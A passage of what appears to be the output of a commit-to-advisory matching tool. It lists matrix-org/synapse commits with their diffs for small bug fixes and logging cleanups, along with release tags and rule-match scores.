"v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8942, 8942", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: redirect, resource", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: homeserver, server", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8942, 8876", - "relevance": 2 - } - ] - }, - { - "commit_id": "3ad699cc65dc55d4329a59a5f621ac4dadaa0fc5", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608130324, - "hunks": 2, - "message": "Fix generate_log_config script (#8952) It used to write an empty file if you gave it a -o arg.", - "diff": [ - "diff --git a/changelog.d/8952.misc b/changelog.d/8952.misc", - "new file mode 100644", - "index 000000000..4c4a87464", - "--- /dev/null", - "+++ b/changelog.d/8952.misc", - "@@ -0,0 +1 @@", - "+Fix bug in `generate_log_config` script which made it write empty files.", - "diff --git a/scripts/generate_log_config b/scripts/generate_log_config", - "index b6957f48a..a13a5634a 100755", - "--- a/scripts/generate_log_config", - "+++ b/scripts/generate_log_config", - "@@ -42,2 +42,4 @@ if __name__ == \"__main__\":", - " args = parser.parse_args()", - "- args.output_file.write(DEFAULT_LOG_CONFIG.substitute(log_file=args.log_file))", - "+ out = args.output_file", - "+ out.write(DEFAULT_LOG_CONFIG.substitute(log_file=args.log_file))", - "+ out.flush()" - ], - "changed_files": [ - "changelog.d/8952.misc", - "scripts/generate_log_config" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8952": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8952, 8952", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: write, file", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8952", - "relevance": 2 - } - ] - }, - { - "commit_id": "7a332850e6fea9585ac440a76a827e7a93663d89", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608130406, - "hunks": 0, - "message": "Merge pull request #8951 from matrix-org/rav/username_picker_2 More preparatory refactoring of the OidcHandler tests", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8951": "Implement a username picker for synapse #8942" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8951, 8951", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: request", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8951", - "relevance": 2 - } - ] - }, - { - "commit_id": "3e8292d48324d329c188d0125cdec4020ddc39ff", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607529792, - "hunks": 0, - "message": "Merge pull request #8906 from matrix-org/rav/fix_multiarch_builds Pin the docker version for multiarch builds", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8906": "Missing arm64 and armv7 docker builds #8907" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8906, 8906", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: request, version", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8906", - "relevance": 2 - } - ] - }, - { - "commit_id": "4136255d3cd733d3b9997f3f23a837d76cec7aaf", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608294375, - "hunks": 3, - "message": "Ensure that a URL exists in the content during push. (#8965) This fixes an KeyError exception, after this PR the content is just considered unknown.", - "diff": [ - "diff --git a/changelog.d/8965.bugfix b/changelog.d/8965.bugfix", - "new file mode 100644", - "index 000000000..cbccebddb", - "--- /dev/null", - "+++ b/changelog.d/8965.bugfix", - "@@ -0,0 +1 @@", - "+Fix a longstanding bug where a `m.image` event without a `url` would cause errors on push.", - "diff --git a/synapse/push/mailer.py b/synapse/push/mailer.py", - "index 9ff092e8b..4d875dcb9 100644", - "--- a/synapse/push/mailer.py", - "+++ b/synapse/push/mailer.py", - "@@ -488,3 +488,7 @@ class Mailer:", - " ) -> None:", - "- messagevars[\"image_url\"] = event.content[\"url\"]", - "+ \"\"\"", - "+ Potentially add an image URL to the message variables.", - "+ \"\"\"", - "+ if \"url\" in event.content:", - "+ messagevars[\"image_url\"] = event.content[\"url\"]", - "diff --git a/synapse/res/templates/notif.html b/synapse/res/templates/notif.html", - "index 6d76064d1..0aaef97df 100644", - "--- a/synapse/res/templates/notif.html", - "+++ b/synapse/res/templates/notif.html", - "@@ -31,3 +31,3 @@", - " {{ message.body_text_html }}", - "- {%- elif message.msgtype == \"m.image\" %}", - "+ {%- elif message.msgtype == \"m.image\" and message.image_url %}", - " " - ], - "changed_files": [ - "changelog.d/8965.bugfix", - "synapse/push/mailer.py", - "synapse/res/templates/notif.html" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8965": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8965, 8965", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: know", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8965", - "relevance": 2 - } - ] - }, - { - "commit_id": "1619802228033455ff6e5863c52556996b38e8c6", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607973587, - "hunks": 22, - "message": "Various clean-ups to the logging context code (#8935)", - "diff": [ - "diff --git a/changelog.d/8916.misc b/changelog.d/8916.misc", - "index c71ef480e..bf94135fd 100644", - "--- a/changelog.d/8916.misc", - "+++ b/changelog.d/8916.misc", - "@@ -1 +1 @@", - "-Improve structured logging tests.", - "+Various clean-ups to the structured logging and logging context code.", - "diff --git a/changelog.d/8935.misc b/changelog.d/8935.misc", - "new file mode 100644", - "index 000000000..bf94135fd", - "--- /dev/null", - "+++ b/changelog.d/8935.misc", - "@@ -0,0 +1 @@", - "+Various clean-ups to the structured logging and logging context code.", - "diff --git a/synapse/config/logger.py b/synapse/config/logger.py", - "index d4e887a3e..4df3f93c1 100644", - "--- a/synapse/config/logger.py", - "+++ b/synapse/config/logger.py", - "@@ -208,3 +208,3 @@ def _setup_stdlib_logging(config, log_config_path, logBeginner: LogBeginner) ->", - "- log_context_filter = LoggingContextFilter(request=\"\")", - "+ log_context_filter = LoggingContextFilter()", - " log_metadata_filter = MetadataFilter({\"server_name\": config.server_name})", - "diff --git a/synapse/http/site.py b/synapse/http/site.py", - "index 5f0581dc3..5a5790831 100644", - "--- a/synapse/http/site.py", - "+++ b/synapse/http/site.py", - "@@ -130,4 +130,3 @@ class SynapseRequest(Request):", - " request_id = self.get_request_id()", - "- logcontext = self.logcontext = LoggingContext(request_id)", - "- logcontext.request = request_id", - "+ self.logcontext = LoggingContext(request_id, request=request_id)", - "diff --git a/synapse/logging/context.py b/synapse/logging/context.py", - "index ca0c774cc..a507a83e9 100644", - "--- a/synapse/logging/context.py", - "+++ b/synapse/logging/context.py", - "@@ -205,6 +205,2 @@ class _Sentinel:", - "- def copy_to_twisted_log_entry(self, record):", - "- record[\"request\"] = None", - "- record[\"scope\"] = None", - "-", - " def start(self, rusage: \"Optional[resource._RUsage]\"):", - "@@ -374,9 +370,2 @@ class LoggingContext:", - "- def copy_to_twisted_log_entry(self, record) -> None:", - "- \"\"\"", - "- Copy logging fields from this context to a Twisted log record.", - "- \"\"\"", - "- record[\"request\"] = self.request", - "- record[\"scope\"] = self.scope", - "-", - " def start(self, rusage: \"Optional[resource._RUsage]\") -> None:", - "@@ -544,9 +533,6 @@ class LoggingContextFilter(logging.Filter):", - " record.", - "- Args:", - "- **defaults: Default values to avoid formatters complaining about", - "- missing fields", - " \"\"\"", - "- def __init__(self, **defaults) -> None:", - "- self.defaults = defaults", - "+ def __init__(self, request: str = \"\"):", - "+ self._default_request = request", - "@@ -558,4 +544,3 @@ class LoggingContextFilter(logging.Filter):", - " context = current_context()", - "- for key, value in self.defaults.items():", - "- setattr(record, key, value)", - "+ record.request = self._default_request", - "@@ -565,3 +550,4 @@ class LoggingContextFilter(logging.Filter):", - " if context is not None:", - "- context.copy_to(record)", - "+ # Logging is interested in the request.", - "+ record.request = context.request", - "diff --git a/synapse/metrics/background_process_metrics.py b/synapse/metrics/background_process_metrics.py", - "index 76b7decf2..70e0fa45d 100644", - "--- a/synapse/metrics/background_process_metrics.py", - "+++ b/synapse/metrics/background_process_metrics.py", - "@@ -201,4 +201,3 @@ def run_as_background_process(desc: str, func, *args, bg_start_span=True, **kwar", - "- with 